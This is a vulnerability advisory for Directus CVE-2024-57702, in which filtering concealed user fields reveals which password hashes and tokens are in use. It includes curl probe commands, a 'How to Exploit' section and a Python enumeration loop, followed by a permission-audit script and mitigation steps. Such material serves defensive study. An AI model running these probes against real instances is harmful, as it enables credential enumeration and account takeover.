Directus, Authentication Bypass, CVE-2024-57702 (Critical)


How the CVE Works:

The vulnerability is a flaw in how Directus handles search and filter queries on concealed fields. When an authenticated user with read permission filters the `directus_users` collection on a sensitive field such as `token`, `tfa_secret` or `password` (for example `filter[password][_eq]=<value>`), the API still returns the matching records. The field's value is masked in the response with asterisks (`**********`), but the presence of a record at all confirms that the filtered-for value is stored. This turns the API into an oracle for enumeration: an attacker can systematically test candidate values, such as password hashes taken from breach databases, and learn which ones are in use and by whom. The default "App Access" permissions grant users excessive read access to `directus_users`, so these probes work against every user's record, not just the attacker's own.
Platform: Directus
Version: < 10.13.0
Vulnerability: Enumeration
Severity: Critical
Date: 2024-12-19

Prediction: Patch 2024-12-23

What Undercode Say:

`curl -X GET -H 'Authorization: Bearer <session-token>' 'https://[directus-instance]/users?filter[password][_eq]=<candidate-hash>' -o search_results.json`

`grep -c "id" search_results.json` (a non-zero count means a record matched, i.e. the hash is in use)

`python3 exploit.py --target [directus-instance] --hashlist hashes.txt`

How to Exploit:

The attacker uses an authenticated session to query the concealed fields of `directus_users`, placing known compromised password hashes (or candidate token values) into the filter. Whenever the system returns a user record, the filtered value is confirmed to be in use, even though the field itself is masked. The attacker thus identifies which accounts carry a known hash and targets them for takeover.
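The probe loop described above, written out as an added example (this is not code from the original post or from the Directus project). It assumes the Directus REST filter syntax `filter[<field>][_eq]=<value>` on `GET /users` and a JSON body of the form `{"data": [...]}`; the host name, the user table and the hash strings are constructed for offline demonstration, and `fake_fetch` mimics the flawed behaviour so the loop can be run without a live instance.

```python
"""Added example, not code from the original post or from Directus.  It models the
enumeration the advisory describes: a filter on a concealed field of directus_users
returns a record when the filter value matches, even though the field itself is
masked in the response.  Assumed: Directus' REST filter syntax
`filter[<field>][_eq]=<value>` on GET /users, and a JSON body {"data": [...]}.
The host, user table and hashes below are constructed for offline demonstration."""
import json
from urllib.parse import parse_qs, urlencode, urlparse

CONCEALED_FIELDS = ("password", "token", "tfa_secret")  # fields named in the advisory
MASK = "**********"                                       # how a concealed value is rendered


def build_probe_url(base_url, field, value):
    """URL for one probe: does any user have `field` equal to `value`?"""
    if field not in CONCEALED_FIELDS:
        raise ValueError(f"not a concealed field: {field}")
    query = urlencode({f"filter[{field}][_eq]": value, "fields": "id,email", "limit": 1})
    return f"{base_url.rstrip('/')}/users?{query}"


def matched_ids(response_body):
    """IDs of the records in a /users response.  The masked value is useless;
    only the presence of a record carries information."""
    try:
        rows = json.loads(response_body).get("data", [])
    except (ValueError, AttributeError):
        return []
    return [row["id"] for row in rows if isinstance(row, dict) and "id" in row]


def enumerate_values(base_url, field, candidates, fetch):
    """Probe each candidate (e.g. hashes from a breach dump) and return the ones that
    exist, mapped to the user IDs holding them.  `fetch(url)` returns the response body,
    so the loop can run through a real authenticated session or through a stub."""
    hits = {}
    for cand in candidates:
        ids = matched_ids(fetch(build_probe_url(base_url, field, cand)))
        if ids:
            hits[cand] = ids
    return hits


# Constructed stand-in for a vulnerable instance (hash strings are made up, not real hashes)
HIT_HASH = "$argon2id$v=19$m=65536,t=3,p=4$c2FsdDE$aGFzaDE"
MISS_HASH = "$argon2id$v=19$m=65536,t=3,p=4$c2FsdDI$aGFzaDI"
FAKE_USERS = [
    {"id": "u-1", "email": "alice@example.com",
     "password": "$argon2id$v=19$m=65536,t=3,p=4$c2FsdDA$aGFzaDA"},
    {"id": "u-2", "email": "bob@example.com", "password": HIT_HASH},
]


def fake_fetch(url):
    """Mimics the flawed behaviour: the filter is evaluated against the real stored
    value, while the record that comes back masks it."""
    qs = parse_qs(urlparse(url).query)
    rows = []
    for user in FAKE_USERS:
        for key, vals in qs.items():
            if key.startswith("filter[") and key.endswith("][_eq]"):
                field = key[len("filter["):-len("][_eq]")]
                if user.get(field) == vals[0]:
                    rows.append({"id": user["id"], "email": user["email"], field: MASK})
    return json.dumps({"data": rows})


def demo():
    """Run the probe loop against the stand-in: one hash is in use, one is not."""
    return enumerate_values("https://directus.example", "password",
                            [HIT_HASH, MISS_HASH], fake_fetch)


if __name__ == "__main__":
    print(demo())
```

Against a live target, `fetch` would be a session-bearing HTTP call (an `Authorization: Bearer` header on each GET); the rest of the loop is unchanged, which is what makes the masked response irrelevant to the attacker.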

Protection from this CVE:

Update to v10.13.0 or later. Remove the default App Access read permission that lets users read other users' records in `directus_users`. Implement field-level access controls so concealed fields (`password`, `token`, `tfa_secret`) are not readable by ordinary roles. Audit every role's permissions on `directus_users`. Apply rate and query limits to slow down enumeration.
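An added example, not code from the original post or from Directus, that turns the "audit user role permissions" and "field-level access controls" advice into a check. It assumes the role-based permission objects of Directus 10.x, shaped `{"role", "collection", "action", "fields", "permissions"}` as returned by `GET /permissions` (the field names used here are an assumption about that schema), and the sample rules are constructed. It flags read rules on `directus_users` that expose concealed fields or that are not scoped to `$CURRENT_USER`, and produces the replacement rule; the version upgrade remains the primary fix, this catches the permissive default the advisory blames.

```python
"""Added example, not code from the original post or from Directus.  Audits a list of
Directus 10.x role-based permission rules for the over-broad read that enables the
enumeration: a read rule on directus_users that exposes concealed fields and/or is not
limited to the caller's own record.  The rule shape {"role", "collection", "action",
"fields", "permissions"} is assumed to mirror GET /permissions; the sample rules below
are constructed."""

CONCEALED_FIELDS = {"password", "token", "tfa_secret"}
SAFE_USER_FIELDS = ["id", "first_name", "last_name", "email", "avatar", "role", "status"]


def _mentions_current_user(node):
    """True if a filter object references $CURRENT_USER anywhere, nested _and/_or included."""
    if isinstance(node, dict):
        return any(_mentions_current_user(v) for v in node.values())
    if isinstance(node, list):
        return any(_mentions_current_user(v) for v in node)
    return node == "$CURRENT_USER"


def find_overbroad_user_reads(rules):
    """Return [(role, reason)] for read rules on directus_users that allow the enumeration."""
    findings = []
    for rule in rules:
        if rule.get("collection") != "directus_users" or rule.get("action") != "read":
            continue
        fields = rule.get("fields") or []
        # "*" means every field, which includes the concealed ones
        exposed = sorted(CONCEALED_FIELDS) if "*" in fields else sorted(CONCEALED_FIELDS & set(fields))
        scoped = _mentions_current_user(rule.get("permissions") or {})
        if exposed:
            findings.append((rule.get("role"), f"concealed fields readable: {', '.join(exposed)}"))
        if not scoped:
            findings.append((rule.get("role"), "read not restricted to $CURRENT_USER"))
    return findings


def hardened_user_read_rule(role):
    """Replacement rule: an explicit safe field list, rows limited to the caller's own record."""
    return {
        "role": role,
        "collection": "directus_users",
        "action": "read",
        "fields": SAFE_USER_FIELDS,
        "permissions": {"_and": [{"id": {"_eq": "$CURRENT_USER"}}]},
    }


# Constructed sample: one rule modelled on a permissive app-access default, one already
# hardened, and one on an unrelated collection that must not be flagged
SAMPLE_RULES = [
    {"role": "app-role", "collection": "directus_users", "action": "read",
     "fields": ["*"], "permissions": {}},
    hardened_user_read_rule("admin-lite"),
    {"role": "app-role", "collection": "articles", "action": "read",
     "fields": ["*"], "permissions": {}},
]


def audit_sample():
    """Run the audit over the constructed rules; only the permissive rule is reported."""
    return find_overbroad_user_reads(SAMPLE_RULES)


if __name__ == "__main__":
    for role, reason in audit_sample():
        print(f"{role}: {reason}")
```

Feed it the JSON `data` array from your own instance's `GET /permissions` (as a list of dicts) to review real roles; every finding corresponds to a rule that either lets a role read concealed fields or lets it read other users' records, the two conditions the enumeration needs.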

Impact:

Enumeration of static API tokens. Matching of known password hashes to accounts. Information disclosure about which credentials are in use. Account takeover risk for accounts whose hash appears in a breach dump. Increased attack surface from the default App Access permissions.


Sources:

Reported By: github.com